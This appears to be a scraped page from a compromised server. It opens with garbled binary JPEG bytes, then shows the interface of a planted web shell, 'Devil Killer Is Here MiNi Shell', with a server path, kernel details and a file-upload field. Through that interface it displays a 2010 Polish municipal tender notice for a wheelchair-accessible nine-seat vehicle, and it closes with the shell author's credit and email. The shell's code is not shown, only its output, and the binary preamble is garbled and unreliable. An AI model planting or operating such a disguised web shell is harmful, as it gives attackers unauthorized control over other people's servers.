JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12326-N-2010.html

<p class="kh_header"><b>Skwierzyna: Dostawa fabrycznie nowego samochodu 9 osobowego (8+1) przystosowanego do przewozu osób niepełnosprawnych z możliwością przewożenia 1 osoby na wózku inwalidzkim.</b><br>
<b>Numer ogłoszenia: 12326 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Skwierzynie , ul. Rynek 1, 66-440 Skwierzyna, woj. lubuskie, tel. 095 7 216 529.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego samochodu 9 osobowego (8+1) przystosowanego do przewozu osób niepełnosprawnych z możliwością przewożenia 1 osoby na wózku inwalidzkim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa fabrycznie nowego samochodu 9 osobowego (8+1) przystosowanego do przewozu osób niepełnosprawnych z możliwością przewozu 1 osoby na wózku inwalidzkim. 
 Parametry techniczne:
1.	rok produkcji: 2010,
2.	rodzaj silnika: wysokoprężny , turbodoładowany, norma EURO 4
3.	rozstaw osi min 3400mm
4.	moc silnika min 100KM,
5.	oryginalne kombi 9 osobowe,
6.	homologacja auta bazowego- kombi 9 osobowe,
7.	homologacja pojazdu do przewozu osób niepełnosprawnych,
8.	fabrycznie nowy,
9.	skrzynia biegów: manualna do 6 biegów,
10.	dźwignia zmiany biegów w formie joysticka,
11.	immobiliser,
12.	centralny zamek z pilotem,
13.	izolacja dźwiękowo- termiczna,
14.	autoalarm honorowany przez firmy ubezpieczeniowe,
15.	wspomaganie układu kierowniczego,
16.	układ hamulcowy z ABS,
17.	hamulce tarczowe wentylowane z przodu i tyłu,
18.	systemy kontroli trakcji: układ EDS, układ ASR, układ MSR, układ ESP,
19.	niezależne zawieszenie przednie i tylne ze stabilizatorem
20.	napęd na koła przednie,
21.	obrotomierz elektroniczny,
22.	lusterka boczne elektrycznie podgrzewane,
23.	klimatyzacja z manualną regulacją,
24.	poduszka powietrzna kierowcy i pasażera,
25.	pasy bezpieczeństwa z napinaczami,
26.	zagłówki z regulacją wysokości,
27.	regulacja kolumny kierownicy w dwóch płaszczyznach,
28.	zabezpieczenie przed złamaniem blokady kierownicy,
29.	całkowite przeszklenie pojazdu, szyby termoizolacyjne/ termiczne,
30.	wycieraczki szyby przedniej z dwustopniową regulacją prędkości i spryskiwaczem,
31.	szyba przesuwna w drugim rzędzie siedzeń,
32.	przesuwne prawe drzwi boczne,
33.	tylne drzwi z szybą ogrzewaną, wycieraczką i spryskiwaczem,
34.	czujnik kontroli zapięcia pasów bezpieczeństwa,
35.	stopień wejściowy boczny oświetlony,
36.	oświetlenie w podsufitce + gniazdo 12V w kabinie,
37.	wentylacja kabiny z recyrkulacją, filtr przeciwpyłowy,
38.	drugi wymiennik ciepła z osobną regulacją nawiewami na przedział,
39.	uchwyt wejściowy w kabinie kierowcy po prawej stronie,
40.	fotel kierowcy z regulacją,
41.	podwójne siedzenie pasażerskie z przodu,
42.	wyjmowany i składany drugi rząd siedzeń 2 + 1 miejscowe,
43.	składany i wyjmowany trzeci rząd siedzeń 3 miejscowy,
44.	wszystkie siedzenia wyposażone w 3 punktowe pasy bezwładnościowe,
45.	sygnał dźwiękowy informujący o nie wyłączonych światłach,
46.	lampki kontrolne zaciągniętego hamulca ręcznego, awarii układu hamulcowego i poziomu płynu,
47.	reflektory przednie halogenowe + regulacja zasięgu,
48.	halogeny przednie przeciwmgielne,
49.	trzecie światło stop + światło przeciwmgielne z tyłu,
50.	przygotowanie do montażu radia- antena,
51.	głośniki w drzwiach kabiny kierowcy,
52.	radioodtwarzacz CD z MP3,
53.	dodatkowe opony zimowe + felgi stalowe: 4szt.,
54.	gaśnica, trójkąt, apteczka, podnośnik, fartuchy przeciwbłotne, pełnowymiarowe koło zapasowe.,
55.	dopuszczenie do ruchu (rozszerzoone badania techniczne)

Przystosowanie do przewozu osoby niepełnosprawnej na wózku:
56.	wszystkie fotele przestrzeni pasażerskiej szybko demontowane w układzie,
57.	wykładzina łatwo zmywalna, antypoślizgowa,
58.	schowek- miejsce (pojemnik na pasy),
59.	szyny wzdłuż mocujące 1 wózek w podłodze pojazdu,
60.	komplet pasów do mocowania 1 wózka inwalidzkiego do szyn,
61.	pasy zabezpieczające osobę niepełnosprawną na wózku inwalidzkim,
62.	najazdy teleskopowe z powłoką antypoślizgową umożliwiającą wprowadzenie wózków do pojazdu,
63.	oznakowanie pojazdu z przodu i z tyłu (symbolem: pojazd dla osób niepełnosprawnych).

    Projekt współfinansowany ze środków PEFRON w ramach programu pn. Program    wyrównywania różnic między regionami II.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9, 34.11.43.00-2, 34.11.44.00-3, 34.11.52.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy spełniają warunki określone w art. 22 ust.1  Prawa  zamówień publicznych, a mianowicie:

1.	posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia, potencjału technicznego i osób zdolnych do wykonania zamówienia
3.	znajduja się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 ustawy Pzp.

Sposób dokonania oceny spełnienia warunków udziału w postępowaniu 
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, wymaganych w  rozdziale VI SIWZ - zgodnie z formułą spełnia - nie spełnia. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z ubiegania się o zamówienie publiczne o czym zamawiający zawiadomi niezwłocznie wykluczonego wykonawcę, podając uzasadnienie faktyczne i prawne. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków zawartych w rozdziale V, Zamawiający wymaga złożenia, do oferty następujących oświadczeń i dokumentów :
- celowym jest aby dokumenty oferty ułożyć wg kolejności

1.	formularz ofertowy- załącznik nr 1
2.	oświadczenie- parametry techniczne samochodu, terminy gwarancji- załącznik nr 2
3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
4.	dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
5.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 1 - 8 Ustawy PZP, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 Ustawy PZP, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	ubezpieczenie od odpowiedzialności cywilnej tyt. Prowadzonej działalności dospodarczej- min. suma ubezpieczenia -50.000 zł
9.	w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia, potencjału technicznego i osób zdolnych do wykonania zamówienia, przedłoży referencje lub opinie w zakresie dostawy przedmiotu zamówienia - minimum 3 dostaw o podobnym charakterze.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.skwierzyna.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
ul. Rynek 1
66-440 Skwierzyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 10:00, miejsce: Urząd Miejski
ul. Rynek 1
66-440 Skwierzyna 
(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com